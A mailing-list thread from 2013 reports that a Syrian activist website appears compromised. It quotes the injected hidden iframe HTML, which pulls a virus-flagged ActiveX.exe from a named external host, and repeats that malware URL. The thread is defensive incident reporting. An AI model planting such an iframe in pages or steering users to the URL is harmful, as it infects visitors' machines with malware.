[liberationtech] Syrian-martyrs.com website probably compromised by virus

SiNA Rabbani sina at redteam.io
Tue Jan 29 14:32:24 PST 2013 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

holly shit:

<iframe name="I1" width="10" height="10"
src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
border="0"
frameborder="0">


:/ if you are running windows don't even go there!!!


Andrew Lewis:
> I can get to this in 6 hours or so, maybe someone is willing to
> jump on this before then?
> 
> -Andrew
> 
> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
> 
>> Dear Libtech,
>> 
>> We just saw that the website : http://www.syrian-martyrs.com is
>> probably compromised. Every page of the website contains an
>> iFrame which links to a .exe file which is detected as a virus by
>> antivirus software: 
>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>
>>
>> 
The fact that the HTML code is present at the bottom of each page makes
>> me think that the "index.php" page has been changed in a way that
>> makes that iFrame appear on every page of the website, after the
>> dynamic content.
>> 
>> It also probably means that the attackers have some kind of
>> access to the server. My guess would be going to a PHP shell, but
>> I'm no expert in this.
>> 
>> Any help, clue, investigation, would be very welcome :)
>> 
>> Thank you, KheOps
>> 
>> -- Unsubscribe, change to digest, or change password at:
>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> -- Unsubscribe, change to digest, or change password at:
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 


- -- 
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRCE3zAAoJEDxieAEiLOmomokQALhspfbV3gILR9uG9+28Fr+a
97driwAkcTGlCRsMuPAGFVeDlVnLo2RmnXj2X3uusEY+uON0zysx0+uhj3+ar5cM
MU/Mwg3rytYAY63f2ZKdisTAWZF5FPDF+MMFNhKIG3a/60i/u1F+TP216aEOcHOW
y9p79SSMap+YPd31ojPKskY3pz3Jtp5C56lRMFMBdTs2ajVRhSRGK9DA6DyGa/9v
nGNkQ6o6HexdLpTKR2VDTpZtRFo8PO8E6ouPB4PCOhEPDw4JfKvu+KOIqAd8WWMl
9i/vgXKQBucQLwm/BgAwP6GrZF8IEOJFPbBVlUSHpKGWQ10mwvREs7x/bzUWWRWq
UHeYapCyCRjiaIVw3LTXJ5WPKI08vVqcGE6luQRcCT0ZLB0B6XhQi4Ew1wmI3K+w
F2fh5XtdjtSufDmfAaw/QMTOdq3x/iOVSacGX1OmR2Y7On4ZcDIdJZLnhWDVOaUM
kfAwmT8mf8d0MAhtv4jhpViHQOeC1HJa7cFUWeeMxhRSr1Zbefvg0m7a6NeYuHPH
x2pE3NYI1CdHJ+QYiWbrcFKEfftdQvDBqSaD9ED1vfjRwD/y6tHDxCIsutUl4KcR
hqplw+9YX4HdElXAK5RldfXG2QCrfpQZNIi/OBWwH+etTfTBYd/F86IQGg/cJLj8
To0sHyoZUxuAoLQFUczz
=w6gN
-----END PGP SIGNATURE-----

More information about the liberationtech mailing list